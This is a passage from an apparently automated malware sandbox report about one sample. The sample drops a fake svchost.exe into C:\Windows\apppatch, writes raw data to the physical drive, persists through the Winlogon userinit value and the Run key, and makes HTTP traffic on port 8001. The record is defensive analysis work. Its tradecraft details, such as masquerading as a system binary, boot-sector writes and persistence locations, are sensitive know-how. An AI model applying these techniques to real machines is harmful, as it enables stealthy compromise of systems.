Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: OjKmJJm2YT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nFjEHtbDTFjy.exe, 00000005.00000000.1672686954.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000006.00000002.1795769994.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000007.00000002.1780570957.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 0000000B.00000002.1782306415.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 0000000E.00000002.1690242673.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000010.00000002.1703422798.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000015.00000002.1707411843.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000018.00000000.1704279183.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 0000001A.00000002.1712407341.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 0000001C.00000000.1711075961.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 0000001E.00000002.1719589028.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000020.00000000.1717183667.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000022.00000002.1729620714.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000024.00000002.1732605635.000000000014E000.00000002.00000001.01000000.0000000A.sdmp, nFjEHtbDTFjy.exe, 00000026.00000000.1731444284.000000000014E000.00000002.00000001.01000000.0000000A.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeUnpacked PE file: 0.2.OjKmJJm2YT.exe.400000.2.unpack .text:ER;.D:W;.SC:W;.Wp:R;.aS:W;.vtzr:R;.fvH:R;.data:W;.Lx:W;.sOZF:W;.h:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.0.unpack .text:ER;.D:W;.SC:W;.Wp:R;.aS:W;.vtzr:R;.fvH:R;.data:W;.Lx:W;.sOZF:W;.h:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeUnpacked PE file: 5.2.nFjEHtbDTFjy.exe.690000.2.unpack
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeUnpacked PE file: 21.2.nFjEHtbDTFjy.exe.2440000.2.unpack
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeUnpacked PE file: 26.2.nFjEHtbDTFjy.exe.2490000.2.unpack
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeUnpacked PE file: 30.2.nFjEHtbDTFjy.exe.2480000.2.unpack
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeUnpacked PE file: 0.2.OjKmJJm2YT.exe.400000.2.unpack
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.0.unpack
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_004020E0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_004020E0
Source: OjKmJJm2YT.exeStatic PE information: real checksum: 0x29533cca should be: 0x3615e
Source: svchost.exe.0.drStatic PE information: real checksum: 0x3d7bb841 should be: 0x3615e
Source: OjKmJJm2YT.exeStatic PE information: section name: .D
Source: OjKmJJm2YT.exeStatic PE information: section name: .SC
Source: OjKmJJm2YT.exeStatic PE information: section name: .Wp
Source: OjKmJJm2YT.exeStatic PE information: section name: .aS
Source: OjKmJJm2YT.exeStatic PE information: section name: .vtzr
Source: OjKmJJm2YT.exeStatic PE information: section name: .fvH
Source: OjKmJJm2YT.exeStatic PE information: section name: .Lx
Source: OjKmJJm2YT.exeStatic PE information: section name: .sOZF
Source: OjKmJJm2YT.exeStatic PE information: section name: .h
Source: svchost.exe.0.drStatic PE information: section name: .D
Source: svchost.exe.0.drStatic PE information: section name: .SC
Source: svchost.exe.0.drStatic PE information: section name: .Wp
Source: svchost.exe.0.drStatic PE information: section name: .aS
Source: svchost.exe.0.drStatic PE information: section name: .vtzr
Source: svchost.exe.0.drStatic PE information: section name: .fvH
Source: svchost.exe.0.drStatic PE information: section name: .Lx
Source: svchost.exe.0.drStatic PE information: section name: .sOZF
Source: svchost.exe.0.drStatic PE information: section name: .h
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0044B895 push cs; retf 0004h0_2_0044B8F5
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0044E89D push es; iretd 0_2_0044E8AC
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0044B1E0 push eax; ret 0_2_0044B20E
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0044B55E pushad ; ret 0_2_0044B569
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0044B56A push eax; ret 0_2_0044B56D
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0044B576 push ss; ret 0_2_0044B579
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0044EF69 push cs; iretd 0_2_0044EF78
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0044EF33 push cs; ret 0_2_0044EF48
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00720678 push dword ptr [esp+48h]; ret 0_2_00720747
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0072065B push ebx; ret 0_2_00720677
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B895 push cs; retf 0004h2_2_0044B8F5
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044E89D push es; iretd 2_2_0044E8AC
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B1E0 push eax; ret 2_2_0044B20E
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B55E pushad ; ret 2_2_0044B569
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B56A push eax; ret 2_2_0044B56D
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B576 push ss; ret 2_2_0044B579
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044EF69 push cs; iretd 2_2_0044EF78
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044EF33 push cs; ret 2_2_0044EF48
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF8B33 push cs; ret 2_2_02BF8B48
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF8B69 push cs; iretd 2_2_02BF8B78
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF849D push es; iretd 2_2_02BF84AC
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF4DE0 push eax; ret 2_2_02BF4E0E
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_023E0678 push dword ptr [esp+48h]; ret 2_2_023E0747
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_023E065B push ebx; ret 2_2_023E0677
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A46895 push cs; retf 0004h2_2_02A468F5
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A368D2 push ebp; retf 2_2_02A368D3
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A461E0 push eax; ret 2_2_02A4620E
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A3664C push ebp; retf 2_2_02A3664D
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A4656A push eax; ret 2_2_02A4656D
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A46576 push ss; ret 2_2_02A46579
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A4655E pushad ; ret 2_2_02A46569

Persistence and Installation Behavior

barindex
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u2_2_02BC33F0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u5_2_006A33F0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u6_2_014E33F0
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeExecutable created and started: C:\Windows\apppatch\svchost.exeJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: API: WriteFile string: \\?\globalroot\systemroot\system32\tasks\0_2_00403560
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file

Boot Survival

barindex
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u2_2_02BC33F0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u5_2_006A33F0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u6_2_014E33F0
Source: C:\Windows\apppatch\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon userinitJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Hooking and other Techniques for Hiding and Protection

barindex
Source: c:\users\user\desktop\ojkmjjm2yt.exeFile moved: C:\Users\user\AppData\Local\Temp\BB59.tmpJump to behavior
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 8001
Source: unknownNetwork traffic detected: HTTP traffic on port 8001 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 8001
Source: unknownNetwork traffic detected: HTTP traffic on port 8001 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 57349 -> 8001
Source: unknownNetwork traffic detected: HTTP traffic on port 8001 -> 57349
Source: unknownNetwork traffic detected: HTTP traffic on port 57349 -> 8001
Source: unknownNetwork traffic detected: HTTP traffic on port 8001 -> 57349
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBD300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,2_2_02BBD300
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,2_2_02BB9ED0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBCFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02BBCFE9
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBCFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02BBCFE9
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02BBCDC0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02BBCDC0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02BBCDC0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02BBCDC0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBCD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,2_2_02BBCD50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_0069D300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,5_2_0069D300
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_0069CD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,5_2_0069CD50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_0069CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0069CDC0
